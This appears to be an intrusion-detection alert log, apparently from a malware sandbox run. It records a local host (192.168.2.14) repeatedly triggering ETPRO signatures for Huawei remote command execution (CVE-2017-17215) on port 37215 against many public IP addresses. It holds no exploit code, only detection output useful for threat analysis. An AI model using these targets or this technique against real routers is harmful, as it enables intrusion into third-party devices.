                                                    07/10/24-08:27:34.131250TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4457437215192.168.2.14157.10.189.80
                                                    07/10/24-08:27:19.166919TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5463437215192.168.2.1441.148.149.77
                                                    07/10/24-08:27:23.849464TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5174237215192.168.2.14208.51.219.140
                                                    07/10/24-08:27:03.002542TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4064837215192.168.2.1441.232.136.129
                                                    07/10/24-08:27:24.949781TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5232037215192.168.2.14137.64.246.173
                                                    07/10/24-08:27:24.999763TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4270437215192.168.2.14157.67.243.231
                                                    07/10/24-08:26:18.019477TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5729237215192.168.2.14157.83.17.146
                                                    07/10/24-08:27:02.892178TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4440437215192.168.2.14157.191.229.46
                                                    07/10/24-08:27:10.663912TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4624437215192.168.2.14197.136.172.110
                                                    07/10/24-08:27:13.862636TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3999237215192.168.2.14197.91.184.187
                                                    07/10/24-08:27:13.967608TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3796237215192.168.2.14197.164.221.133
                                                    07/10/24-08:26:43.933427TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4665037215192.168.2.14206.147.6.224
                                                    07/10/24-08:27:10.679759TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4969237215192.168.2.14152.34.71.38
                                                    07/10/24-08:27:30.428214TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3377437215192.168.2.14157.226.49.192
                                                    07/10/24-08:26:11.126416TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5231237215192.168.2.1441.36.102.72
                                                    07/10/24-08:26:13.822252TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3984637215192.168.2.14197.116.176.174
                                                    07/10/24-08:26:13.828285TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4639237215192.168.2.14157.6.170.133
                                                    07/10/24-08:26:15.796224TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3700637215192.168.2.1488.189.147.181
                                                    07/10/24-08:26:23.320744TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5706437215192.168.2.1441.189.60.9
                                                    07/10/24-08:26:33.201787TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4386437215192.168.2.1441.123.48.54
                                                    07/10/24-08:27:31.457680TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4293037215192.168.2.1441.152.204.186
                                                    07/10/24-08:27:11.557803TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5071637215192.168.2.1441.60.44.74
                                                    07/10/24-08:26:13.675560TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3433637215192.168.2.14197.112.168.229
                                                    07/10/24-08:26:43.856430TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4337637215192.168.2.14157.110.169.47
                                                    07/10/24-08:27:13.721350TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4816237215192.168.2.14157.55.70.121
                                                    07/10/24-08:26:25.481265TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5625037215192.168.2.14138.66.98.209
                                                    07/10/24-08:26:43.763647TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4384637215192.168.2.14157.177.184.74
                                                    07/10/24-08:26:11.115720TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4610837215192.168.2.14197.2.240.85
                                                    07/10/24-08:26:49.824004TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5316237215192.168.2.14197.150.15.193
                                                    07/10/24-08:26:25.487811TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3842837215192.168.2.14208.91.65.199
                                                    07/10/24-08:26:25.466944TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5201637215192.168.2.1441.119.17.101
                                                    07/10/24-08:26:44.495455TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5002637215192.168.2.1441.223.14.75
                                                    07/10/24-08:26:22.281648TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4433237215192.168.2.14197.24.229.181
                                                    07/10/24-08:27:02.853757TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3758437215192.168.2.14157.249.168.92
                                                    07/10/24-08:26:28.791726TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3543637215192.168.2.14157.228.140.165
                                                    07/10/24-08:26:23.313392TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4334837215192.168.2.1441.53.139.176
                                                    07/10/24-08:27:30.492853TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5441237215192.168.2.14197.10.241.173
                                                    07/10/24-08:27:08.398717TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5249237215192.168.2.14139.148.66.241
                                                    07/10/24-08:26:20.148886TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3279837215192.168.2.1441.215.175.140
                                                    07/10/24-08:27:22.480250TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4978637215192.168.2.14100.206.197.169
                                                    07/10/24-08:26:31.090625TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3491637215192.168.2.14157.249.125.64
                                                    07/10/24-08:26:49.792621TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3821037215192.168.2.1441.146.134.227
                                                    07/10/24-08:27:24.993210TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5183037215192.168.2.1441.38.57.228
                                                    07/10/24-08:26:47.841938TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3859437215192.168.2.14197.9.181.114
                                                    07/10/24-08:26:28.635714TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3538837215192.168.2.1450.222.200.12
                                                    07/10/24-08:27:28.169904TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5699437215192.168.2.14197.175.56.247
                                                    07/10/24-08:26:15.880564TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4831637215192.168.2.14157.114.88.13
                                                    07/10/24-08:27:22.468391TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4360437215192.168.2.14157.254.61.130
                                                    07/10/24-08:27:19.294110TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5554037215192.168.2.14157.63.153.63
                                                    07/10/24-08:27:17.020582TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4148237215192.168.2.14157.176.25.68
                                                    07/10/24-08:26:29.789331TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4545237215192.168.2.14197.165.110.68
                                                    07/10/24-08:26:26.591282TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3394437215192.168.2.14197.157.95.224
                                                    07/10/24-08:27:10.629470TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4837237215192.168.2.14197.15.17.250
                                                    07/10/24-08:27:19.163791TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4861037215192.168.2.14157.212.51.219
                                                    07/10/24-08:27:30.402318TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3637037215192.168.2.1441.29.30.179
                                                    07/10/24-08:26:42.426350TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3932237215192.168.2.14157.168.69.105
                                                    07/10/24-08:26:57.679549TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6028437215192.168.2.14197.162.71.220
                                                    07/10/24-08:26:26.594914TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3967037215192.168.2.1441.80.2.68
                                                    07/10/24-08:26:49.855576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4896037215192.168.2.14157.188.164.88
                                                    07/10/24-08:26:57.641843TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4545837215192.168.2.1441.178.183.193
                                                    07/10/24-08:26:52.010263TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5441637215192.168.2.14205.115.121.86
                                                    07/10/24-08:26:28.792778TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4738837215192.168.2.1499.179.236.75
                                                    07/10/24-08:27:30.516859TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3400637215192.168.2.14157.202.52.195
                                                    07/10/24-08:26:55.421607TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5105637215192.168.2.1441.202.195.255
                                                    07/10/24-08:27:22.474550TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4927837215192.168.2.1441.117.180.136
                                                    07/10/24-08:27:24.920264TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4392037215192.168.2.14157.44.61.124
                                                    07/10/24-08:26:33.239188TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5732637215192.168.2.14197.195.20.41
                                                    07/10/24-08:27:17.091554TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3370437215192.168.2.14197.54.162.123
                                                    07/10/24-08:26:34.223623TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5268037215192.168.2.14123.112.118.36
                                                    07/10/24-08:26:47.998541TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4104037215192.168.2.1436.232.125.68
                                                    07/10/24-08:27:07.264352TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3843637215192.168.2.14157.59.205.197
                                                    07/10/24-08:26:28.652077TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3559037215192.168.2.1441.37.223.187
                                                    07/10/24-08:26:36.378421TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5803037215192.168.2.14183.134.157.226
                                                    07/10/24-08:27:20.428275TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5062637215192.168.2.14157.91.135.150
                                                    07/10/24-08:26:11.583126TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4370637215192.168.2.142.247.127.226
                                                    07/10/24-08:26:28.867359TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4420037215192.168.2.14185.14.104.242
                                                    07/10/24-08:26:45.689039TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5549637215192.168.2.14197.193.248.251
                                                    07/10/24-08:27:28.169608TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5140037215192.168.2.14200.249.207.46
                                                    07/10/24-08:27:23.786219TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5648837215192.168.2.14165.127.119.59
                                                    07/10/24-08:27:33.970105TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4718037215192.168.2.14197.205.151.93
                                                    07/10/24-08:27:27.080218TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5090037215192.168.2.14148.147.96.23
                                                    07/10/24-08:27:33.941322TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4441437215192.168.2.14157.64.158.248
                                                    07/10/24-08:27:30.505741TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5507237215192.168.2.14157.85.127.6
                                                    07/10/24-08:26:36.378421TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3997237215192.168.2.1484.222.95.153
                                                    07/10/24-08:26:15.812623TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5088437215192.168.2.1460.118.235.104
                                                    07/10/24-08:26:59.757795TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5244837215192.168.2.1441.158.123.253
                                                    07/10/24-08:27:31.459998TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4941437215192.168.2.1441.94.181.234
                                                    07/10/24-08:27:23.921577TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5928037215192.168.2.14157.20.212.100
                                                    07/10/24-08:27:28.108861TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4348037215192.168.2.14157.214.114.237
                                                    07/10/24-08:26:25.478024TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3296237215192.168.2.14212.250.133.198
                                                    07/10/24-08:27:13.883458TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5097837215192.168.2.1441.231.0.158
                                                    07/10/24-08:27:23.853234TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4238237215192.168.2.14117.196.151.174
                                                    07/10/24-08:27:07.356942TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4662037215192.168.2.1444.211.245.153
                                                    07/10/24-08:27:32.602329TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4725437215192.168.2.14157.207.97.19
                                                    07/10/24-08:26:55.302858TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4387037215192.168.2.1441.183.112.56
                                                    07/10/24-08:26:28.916413TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5847837215192.168.2.14197.27.99.236
                                                    07/10/24-08:26:22.285937TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4458437215192.168.2.14157.247.23.101
                                                    07/10/24-08:27:10.636807TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5917037215192.168.2.14157.140.23.82
                                                    07/10/24-08:27:14.874901TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4930437215192.168.2.14197.224.15.165
                                                    07/10/24-08:26:25.433410TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5024237215192.168.2.14197.196.180.45
                                                    07/10/24-08:26:15.791528TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3802837215192.168.2.14197.102.143.27
                                                    07/10/24-08:26:43.785439TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3392637215192.168.2.14197.105.114.85
                                                    07/10/24-08:27:05.209381TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5887637215192.168.2.14157.51.252.122
                                                    07/10/24-08:26:28.761249TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4142837215192.168.2.14157.213.117.130
                                                    07/10/24-08:26:49.836965TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3627237215192.168.2.14197.104.61.11
                                                    07/10/24-08:27:22.548548TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4264437215192.168.2.1441.25.201.247
                                                    07/10/24-08:26:26.562262TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3465637215192.168.2.14157.253.230.150
                                                    07/10/24-08:27:27.037222TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4063637215192.168.2.1441.106.60.230
                                                    07/10/24-08:26:11.177651TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5017037215192.168.2.14157.144.237.122
                                                    07/10/24-08:26:45.623094TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4845637215192.168.2.1441.221.93.77
                                                    07/10/24-08:27:17.066216TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4540237215192.168.2.14208.14.190.159
                                                    07/10/24-08:27:23.925907TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5804437215192.168.2.1441.23.3.238
                                                    07/10/24-08:26:25.515486TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5546637215192.168.2.14197.71.123.245
                                                    07/10/24-08:27:11.504435TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3548637215192.168.2.1419.175.45.244
                                                    07/10/24-08:27:19.298148TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5056037215192.168.2.1474.221.170.99
                                                    07/10/24-08:27:08.339309TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5834437215192.168.2.14157.148.46.0
                                                    07/10/24-08:26:26.621009TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4277437215192.168.2.14140.191.194.64
                                                    07/10/24-08:26:13.654312TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5171237215192.168.2.14157.39.22.107
                                                    07/10/24-08:26:20.149592TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5503837215192.168.2.14197.226.13.65
                                                    07/10/24-08:26:28.712584TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4385237215192.168.2.1441.43.27.56
                                                    07/10/24-08:26:45.598670TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4269037215192.168.2.1441.121.2.245
                                                    07/10/24-08:27:30.547260TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4306437215192.168.2.14157.254.37.173
                                                    07/10/24-08:26:25.509927TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5220037215192.168.2.14123.22.108.67
                                                    07/10/24-08:26:31.072676TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4915237215192.168.2.1441.26.127.165
                                                    07/10/24-08:27:07.356358TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3631637215192.168.2.14157.14.212.92
                                                    07/10/24-08:27:10.767328TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3296437215192.168.2.1420.69.138.8
                                                    07/10/24-08:27:19.271475TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3827237215192.168.2.14197.249.27.5
                                                    07/10/24-08:26:59.636045TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4329637215192.168.2.14221.30.44.12
                                                    07/10/24-08:27:05.129960TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5404437215192.168.2.1441.145.135.5
                                                    07/10/24-08:26:55.289517TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4380637215192.168.2.14157.170.237.164
                                                    07/10/24-08:26:55.447518TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4813837215192.168.2.1441.157.141.228
                                                    07/10/24-08:27:22.469991TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5077437215192.168.2.14197.147.93.202
                                                    07/10/24-08:27:05.122106TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4596237215192.168.2.1441.252.49.60
                                                    07/10/24-08:27:02.789952TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4239037215192.168.2.14157.139.218.134
                                                    07/10/24-08:27:02.990301TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5161037215192.168.2.1441.182.233.4
                                                    07/10/24-08:27:17.037647TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4674837215192.168.2.14157.130.75.236
                                                    07/10/24-08:26:49.798309TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6082037215192.168.2.1441.126.163.191
                                                    07/10/24-08:26:59.660364TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4066837215192.168.2.14197.95.45.81
                                                    07/10/24-08:27:19.312815TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3600837215192.168.2.1441.27.199.66
                                                    07/10/24-08:26:42.347593TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6094437215192.168.2.1441.204.110.107
                                                    07/10/24-08:27:14.017469TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4512437215192.168.2.1441.164.87.41
                                                    07/10/24-08:26:55.289517TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3455837215192.168.2.14187.139.183.17
                                                    07/10/24-08:27:08.429606TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5729037215192.168.2.14190.184.159.194
                                                    07/10/24-08:26:36.383866TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5186237215192.168.2.14197.102.210.254
                                                    07/10/24-08:27:28.179104TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3721437215192.168.2.14157.26.112.47
                                                    07/10/24-08:27:14.658405TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4700237215192.168.2.1480.51.237.162
                                                    07/10/24-08:27:05.146612TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5773237215192.168.2.1441.159.17.68
                                                    07/10/24-08:26:25.474823TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4544037215192.168.2.1441.203.211.30
                                                    07/10/24-08:26:45.646163TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6029037215192.168.2.14195.158.77.249
                                                    07/10/24-08:26:59.634002TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4821837215192.168.2.1434.90.240.206
                                                    07/10/24-08:27:14.890246TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5593637215192.168.2.14157.220.89.16
                                                    07/10/24-08:26:38.569923TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4279037215192.168.2.1441.103.40.161
                                                    07/10/24-08:26:48.031000TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3525037215192.168.2.1441.98.40.178
                                                    07/10/24-08:26:23.309786TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5464437215192.168.2.1441.27.127.7
                                                    07/10/24-08:26:43.910396TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5345037215192.168.2.14101.145.151.121
                                                    07/10/24-08:26:22.228367TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5553237215192.168.2.1441.173.214.193
                                                    07/10/24-08:27:33.730213TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5222837215192.168.2.14197.166.165.166
                                                    07/10/24-08:27:22.571797TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4578637215192.168.2.14157.220.241.59
                                                    07/10/24-08:27:33.939106TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4411837215192.168.2.1441.88.31.235
                                                    07/10/24-08:26:17.933470TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4340637215192.168.2.14205.85.198.14
                                                    07/10/24-08:27:33.886878TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4630637215192.168.2.14136.47.103.22
                                                    07/10/24-08:27:03.004386TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5622637215192.168.2.1441.230.177.25
                                                    07/10/24-08:26:59.856754TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3306637215192.168.2.14133.239.196.149
                                                    07/10/24-08:27:22.783603TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4694837215192.168.2.1431.243.87.59
                                                    07/10/24-08:26:31.042472TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3472237215192.168.2.14161.79.87.86
                                                    07/10/24-08:26:22.223907TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4754437215192.168.2.1480.124.171.151
                                                    07/10/24-08:27:30.521330TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5491637215192.168.2.14167.136.173.220
                                                    07/10/24-08:27:08.360438TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3593037215192.168.2.1441.129.8.147
                                                    07/10/24-08:26:22.281648TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4753837215192.168.2.14157.73.54.218
                                                    07/10/24-08:26:29.873958TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4696837215192.168.2.1441.104.0.249
                                                    07/10/24-08:26:28.916413TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5883637215192.168.2.14197.128.35.250
                                                    07/10/24-08:26:38.615907TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4830637215192.168.2.14197.236.1.222
                                                    07/10/24-08:26:14.626418TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3933237215192.168.2.1441.11.123.229
                                                    07/10/24-08:26:28.782000TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6080637215192.168.2.1441.115.10.231
                                                    07/10/24-08:27:30.520394TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3522037215192.168.2.14157.102.228.53
                                                    07/10/24-08:26:20.159669TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5315637215192.168.2.14157.63.55.134
                                                    07/10/24-08:27:33.845766TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4629637215192.168.2.14157.116.252.8
                                                    07/10/24-08:26:15.849080TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3382037215192.168.2.14157.202.9.95
                                                    07/10/24-08:26:41.479752TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5789837215192.168.2.14157.105.187.107
                                                    07/10/24-08:27:13.843143TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5852237215192.168.2.14197.48.14.216
                                                    07/10/24-08:26:59.785283TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5383437215192.168.2.14157.24.165.32
                                                    07/10/24-08:27:23.915755TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5710637215192.168.2.14157.77.49.111
                                                    07/10/24-08:26:43.601358TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3528437215192.168.2.14197.22.252.55
                                                    07/10/24-08:26:11.619310TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5235637215192.168.2.14157.229.181.22
                                                    07/10/24-08:27:19.273246TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4096837215192.168.2.14157.125.55.29
                                                    07/10/24-08:26:29.824818TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4303837215192.168.2.14197.84.200.238
